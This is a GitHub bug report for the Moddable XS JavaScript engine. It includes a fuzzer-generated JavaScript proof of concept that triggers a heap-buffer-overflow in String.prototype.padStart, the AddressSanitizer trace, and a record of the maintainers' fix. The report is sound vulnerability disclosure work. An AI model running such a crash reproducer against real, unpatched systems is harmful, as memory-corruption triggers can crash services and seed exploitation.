heap-buffer-overflow(fx_String_prototype_pad) #581

bird8693 · 2021-02-26T10:30:09Z

Enviroment

operating system: ubuntu18.04
compile command:  cd /pathto/moddable/xs/makefiles/lin
make
test command: ./xst poc

poc:

var oob = '[1]';
var oob = '/re/';
var once = false;
JSON.stringify(759250124);
function makeOobString() {
    var hiddenValue = getHiddenValue();
    var str = 'class x extends Array{}';
    var fun = eval(str);
    makeOobString(fun, hiddenValue);
    var BaYs = Error;
    var oobString = 'new String(\'q\')'.repeat();
    return oobString;
}
var obj = {};
var a = 1;
once = a.toFixed(a);
function f() {
    if (ZeNZ * 1e-15) {
        a = new Array(1, 2, 3);
        this[2] = a;
    }
    var str = 'new String(\'q\')';
    once = true;
    once = JSON.stringify(2147483647);
    var fun = eval(str);
    a = oob.padStart(once, a, kwPT);
    var str = 'class x extends Array{' + oob + '}';
    return {};
    var fun = eval(str);
}
JSON.parse('[1, 2, [4, 5]]', f);
var ZeNZ = ZeNZ;
var oob = '/re/';
var kwPT = new Map([
    [
        once,
        42,
        a,
        once,
        once
    ],
    [
        once,
        a,
        -5e-324,
        once,
        -4294967297
    ]
]);

description

=================================================================
==5929==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f03c1cfe820 at pc 0x7f03c5168904 bp 0x7ffc491cb050 sp 0x7ffc491ca7f8
WRITE of size 1 at 0x7f03c1cfe820 thread T0
    #0 0x7f03c5168903 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c903)
    #1 0x61c2a8 in fx_String_prototype_pad /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsString.c:923
    #2 0x61c3be in fx_String_prototype_padStart /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsString.c:948
    #3 0x5bcb2b in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:824
    #4 0x503d3d in fxReviveJSON /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsJSON.c:622
    #5 0x502cd2 in fxReviveJSON /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsJSON.c:588
    #6 0x4fe395 in fx_JSON_parse /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsJSON.c:143
    #7 0x5bcb2b in fxRunID /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:824
    #8 0x604ee7 in fxRunScript /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsRun.c:4708
    #9 0x6fa9f9 in fxRunProgramFile /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:1369
    #10 0x6ed74c in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:270
    #11 0x7f03c480c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #12 0x4146a8 in _start (/root/AFL/targets/moddable/xst+0x4146a8)

0x7f03c1cfe820 is located 0 bytes to the right of 16777248-byte region [0x7f03c0cfe800,0x7f03c1cfe820)
allocated by thread T0 here:
    #0 0x7f03c5174602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x579189 in fxAllocateChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsPlatforms.c:122
    #2 0x53cd2b in fxGrowChunks /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:377
    #3 0x53b7fe in fxAllocate /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsMemory.c:159
    #4 0x42095a in fxCreateMachine /home/node/mmfuzzer/asan_moddable/moddable/xs/sources/xsAPI.c:1305
    #5 0x6ec9a0 in main /home/node/mmfuzzer/asan_moddable/moddable/xs/tools/xst.c:249
    #6 0x7f03c480c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy
Shadow bytes around the buggy address:
  0x0fe0f8397cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe0f8397cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe0f8397cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe0f8397ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0fe0f8397cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fe0f8397d00: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa
  0x0fe0f8397d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe0f8397d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe0f8397d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe0f8397d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0fe0f8397d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==5929==ABORTING

The text was updated successfully, but these errors were encountered:

mkellner pushed a commit that referenced this issue Mar 15, 2021

XS: #582 #581 #580 #567

3edc913

mkellner pushed a commit that referenced this issue Mar 15, 2021

XS: #582 #581 #580 #567

ee959cb

phoddie added the fixed - please verify Issue has been fixed. Please verify and close. label Mar 15, 2021

phoddie closed this as completed Mar 23, 2021

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

heap-buffer-overflow(fx_String_prototype_pad) #581

heap-buffer-overflow(fx_String_prototype_pad) #581

bird8693 commented Feb 26, 2021

heap-buffer-overflow(fx_String_prototype_pad) #581

heap-buffer-overflow(fx_String_prototype_pad) #581

Comments

bird8693 commented Feb 26, 2021

Enviroment

poc:

description